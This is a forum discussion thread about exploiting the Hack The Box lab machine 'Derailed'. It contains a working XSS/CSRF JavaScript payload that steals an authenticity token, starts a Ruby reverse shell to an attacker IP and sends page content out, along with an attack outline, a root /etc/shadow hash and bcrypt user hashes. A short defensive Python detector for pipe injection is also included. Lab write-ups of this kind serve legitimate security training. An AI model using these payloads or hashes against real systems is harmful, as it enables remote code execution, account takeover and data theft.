Derailed - HTB [Discussion]
Now I'm stuck on the XSS.

I create a report from the clipnote with this payload:

```
function getMiddleText(content,leftStr,rightStr){
    var startIndex = content.indexOf(leftStr)+leftStr.length;
    var endIndex = content.indexOf(rightStr);
    return content.substr(startIndex,endIndex-startIndex);
}
fetch(`http://derailed.htb:3000/administration`)
.then((rep)=>{return rep.text()})
.then((content)=>{
    let token = getMiddleText(content,`authenticity_token" value="`,`" autocomplete=`);
    fetch("http://derailed.htb:3000/administration/reports", {
      "headers": {
        "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "content-type": "application/x-www-form-urlencoded",
      },
      "referrer": "http://derailed.htb:3000/administration",
      "referrerPolicy": "strict-origin-when-cross-origin",
      "body": `authenticity_token=${token}&report_log=|ruby+-rsocket+-e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.XX.XX",4444))'`,
      "method": "POST",
      "mode": "cors",
    }).then((rep=>{
        return rep.text();
    })).then((text)=>{
        fetch("http://10.10.XX.XX/data/"+btoa(text));
    });
})
```
However, I didn't get any response on netcat or on the simple HTTP server on port 80...
Reply
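As an added defender-side example (not code from this thread or from the box): the posted payload starts the `report_log` value with `|`, which is the prefix Ruby's `Kernel#open` treats as a command pipe rather than a file name (an assumption about how the app handles that parameter). The Python below runs over constructed form bodies for `/administration/reports`, flags that pattern, a missing `authenticity_token` and path traversal, and shows the allow-list check a maintainer would want on the parameter.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies (x-www-form-urlencoded); not captured traffic.
SAMPLE_BODIES = [
    "authenticity_token=abc123&report_log=weekly.log",
    "authenticity_token=abc123&report_log=%7Cruby+-rsocket+-e+%27spawn%28%22sh%22%29%27",
    "report_log=..%2F..%2Fetc%2Fpasswd",
]

# Characters that should never appear in a value that names a report file.
SHELL_META = re.compile(r"[|;&`$()<>]")


def analyse_report_body(body: str) -> dict:
    """Decode one form body and list the reasons it looks like abuse of report_log."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    value = params.get("report_log", "")
    findings = []
    if "authenticity_token" not in params:
        findings.append("missing authenticity_token")
    if value.startswith("|"):
        # Ruby: Kernel#open("|cmd") spawns cmd instead of opening a file (assumed app behaviour).
        findings.append("leading pipe: Kernel#open command execution")
    elif SHELL_META.search(value):
        findings.append("shell metacharacters in report_log")
    if ".." in value or value.startswith("/"):
        findings.append("path traversal / absolute path")
    return {"report_log": value, "findings": findings}


def safe_report_name(value: str) -> bool:
    """Allow-list a bare file name: word characters, dots and dashes, no traversal."""
    return re.fullmatch(r"[A-Za-z0-9_.-]+", value) is not None and ".." not in value


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        result = analyse_report_body(body)
        print(result["report_log"], "->", result["findings"] or "ok",
              "| allowed:", safe_report_name(result["report_log"]))
```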
You have to create a user exampleuseruseruseruseruseruseruseruseruseruseruser
Obfuscated the payload and put it in obfuscated char code. I receive a callback but not the token. I will try this XSS you posted here. [url=http://www.mauvecloud.net/charsets/CharCodeFinder.html]Character Code Finder (mauvecloud.net)[/url]
Reply
[quote="yumi" pid="863200" dateline="1669542663"]You have to create a user exampleuseruseruseruseruseruseruseruseruseruseruser
Obfuscated the payload and put it in obfuscated char code. I receive a callback but not the token. I will try this XSS you posted here. [url=http://www.mauvecloud.net/charsets/CharCodeFinder.html]Character Code Finder (mauvecloud.net)[/url][/quote]
Ahh, I misunderstood... Thank you!!!!!
Reply
(November 23, 2022, 11:57 PM)meowmeowattack Wrote: Regarding the intended foothold with XSS

* Overview of the attack concept
    * This challenge is very similar to `rootme\web-client\CSRF-token-bypass`, so if you would like more of a challenge after this, you will learn a lot by visiting the same challenge on rootme.
    * We need to first find a specific sequence to bypass the sanitization and execute arbitrary code, e.g. `xss`
    * Then, we need to use the XSS to map out what the administration page looks like
    * After that, we need to craft a `csrf` payload to do two things: 1) fetch an `authenticity_token` from the `/administration` page, 2) craft a form that posts to `/administration/reports` with the `authenticity_token` we obtained earlier.

* To trigger the payload, the following is the rough structure
    * Register a user by intercepting the traffic to bypass the character limit
    * Craft the user name with a specific pattern to bypass sanitization
    * Login as the new user
    * Create a clipnote with random content
    * Once the note is created, you should be able to see your XSS being executed
    * Report this note and wait for the admin to visit the note (note: sometimes the admin visit process may be broken; if you are certain that your payload should work but didn't see anything within 2 minutes, tough luck, reset and restart. I think this part is not stable)


I'm trying here, but I have a problem with authenticity_token. I didn't receive a shell. Do we have to make the XSS trigger the user to post the authenticity_token in the report?
Reply
[quote="Himitsu" pid="861512" dateline="1669511491"][quote="undeadly" pid="858543" dateline="1669464382"]The author of this box is a great hacker himself and he learnt a lesson to stop publishing id_rsa keys for accounts, at least for insane and hard levels. You have to work your way through, thankfully...[/quote]Yes and no. Yes, after multiple patches were applied the root's private key has been removed. No, from the beginning we could retrieve the root's private key:[quote]┌──(user㉿kali)-[~/.msf4/loot]
└─$ cat 20221120220230_default_127.0.0.1_chrome.debugger._239600.txt
[/quote][/quote]
I tried this box after all patches were already applied. Didn't get a chance earlier. I've been pretty busy with more important stuff these days. After rooting this nice box I didn't find any keys, neither in root's nor even in marcus' folder. Nice job from the author. BTW, I was unsuccessful with the chrome driver vuln. Probably also patched.
[code]
root@derailed:~# id
uid=0(root) gid=0(root) groups=0(root)
root@derailed:~# ls -la
total 76
drwx------ 13 root root 4096 Nov 25 08:41 .
drwxr-xr-x 19 root root 4096 Nov 14 04:56 ..
lrwxrwxrwx  1 root root    9 May 30 15:55 .bash_history -> /dev/null
-rw-------  1 root root  858 Apr 26  2022 .bashrc
drwxr-xr-x  3 root root 4096 Nov  4 08:00 .bundle
drwxr-xr-x  3 root root 4096 Nov  4 08:00 .cache
drwx------  5 root root 4096 Nov  4 08:00 .config
drwxrwxr-x  3 root root 4096 Nov  4 08:00 .gem
drwx------  2 root root 4096 Nov  4 08:00 .gnupg
drwxr-xr-x  3 root root 4096 Nov  4 08:00 google
-rw-------  1 root root  278 Apr 26  2022 .inputrc
drwxr-xr-x  3 root root 4096 Nov  4 08:00 .local
drwx------  2 root root 4096 Nov 20 12:46 meta
drwxr-xr-x  4 root root 4096 Nov  4 08:00 .npm
drwx------  3 root root 4096 Nov  4 08:00 .pki
-rw-r--r--  1 root root  174 Apr 26  2022 .profile
lrwxrwxrwx  1 root root    9 May 29 17:30 .python_history -> /dev/null
-rw-r-----  1 root root   33 Nov 25 04:02 root.txt
-rw-r--r--  1 root root   74 Nov  4 05:01 .selected_editor
lrwxrwxrwx  1 root root    9 May 29 17:30 .sqlite_history -> /dev/null
drwx------  2 root root 4096 Nov 20 16:51 .ssh
lrwxrwxrwx  1 root root    9 May 29 17:32 .wget-hsts -> /dev/null
-rwxr-xr-x  1 root root 2336 Nov 25 08:41 xss.py
root@derailed:~#
root@derailed:~# grep root /etc/shadow
root:$y$j9T$4H76C3VvReuiPfwg2kJ8T/$UAFsX2oGNBaoh.0/aNhrf4:19142:0:99999:7:::
[/code]
[hr]
[quote="yumi" pid="863346" dateline="1669544968"][quote="meowmeowattack" pid="848953" dateline="1669247827"]Regarding the intended foothold with XSS
* Overview of the attack concept
    * This challenge is very similar to `rootme\web-client\CSRF-token-bypass`, so if you would like more of a challenge after this, you will learn a lot by visiting the same challenge on rootme.
    * We need to first find a specific sequence to bypass the sanitization and execute arbitrary code, e.g. `xss`
    * Then, we need to use the XSS to map out what the administration page looks like
    * After that, we need to craft a `csrf` payload to do two things: 1) fetch an `authenticity_token` from the `/administration` page, 2) craft a form that posts to `/administration/reports` with the `authenticity_token` we obtained earlier.
* To trigger the payload, the following is the rough structure
    * Register a user by intercepting the traffic to bypass the character limit
    * Craft the user name with a specific pattern to bypass sanitization
    * Login as the new user
    * Create a clipnote with random content
    * Once the note is created, you should be able to see your XSS being executed
    * Report this note and wait for the admin to visit the note (note: sometimes the admin visit process may be broken; if you are certain that your payload should work but didn't see anything within 2 minutes, tough luck, reset and restart. I think this part is not stable)[/quote]I'm trying here, but I have a problem with authenticity_token. I didn't receive a shell. Do we have to make the XSS trigger the user to post the authenticity_token in the report?[/quote]
authenticity_token is required to access http://derailed.htb:3000/administration/reports, otherwise access is forbidden. Then you get RCE through this report endpoint, yes. If you're certain everything should work, try resetting the box. Multiple folks on the box may break stuff.
Reply
Thanks, got the user flag, on the path to root now, thanks.
Reply
rooted thanks guys
Reply
(November 27, 2022, 10:49 PM)yumi Wrote: rooted thanks guys

congratulations!
I'm trying with http://derailed.htb:3000/administration/reports but I still receive "You must be an admin to access this section". Did you use the same trick to get the administrator account?
Reply
(November 27, 2022, 11:48 PM)_eminem_ Wrote:
(November 27, 2022, 10:49 PM)yumi Wrote: rooted thanks guys

congratulations!
I'm trying with http://derailed.htb:3000/administration/reports but I still receive "You must be an admin to access this section". Did you use the same trick to get the administrator account?

Yes, get a shell as rails.
Reply
(November 26, 2022, 02:48 AM)deer Wrote:
(November 25, 2022, 09:12 AM)j3i_hero Wrote: Could anyone send the alice and toby hashes in
var/www/rails-app/db/development.sqlite3


Alice $2a$12$hkqXQw6n0CxwBxEW/0obHOb.0/Grwie/4z95W3BhoFqpQRKIAxI7.

Toby $2a$12$AD54WZ4XBxPbNW/5gWUIKu0Hpv9UKN5RML3sDLuIqNqqimqnZYyle


Thanks bro.
Could you please send the alice and toby passwords? I tried but I could not crack them.
Reply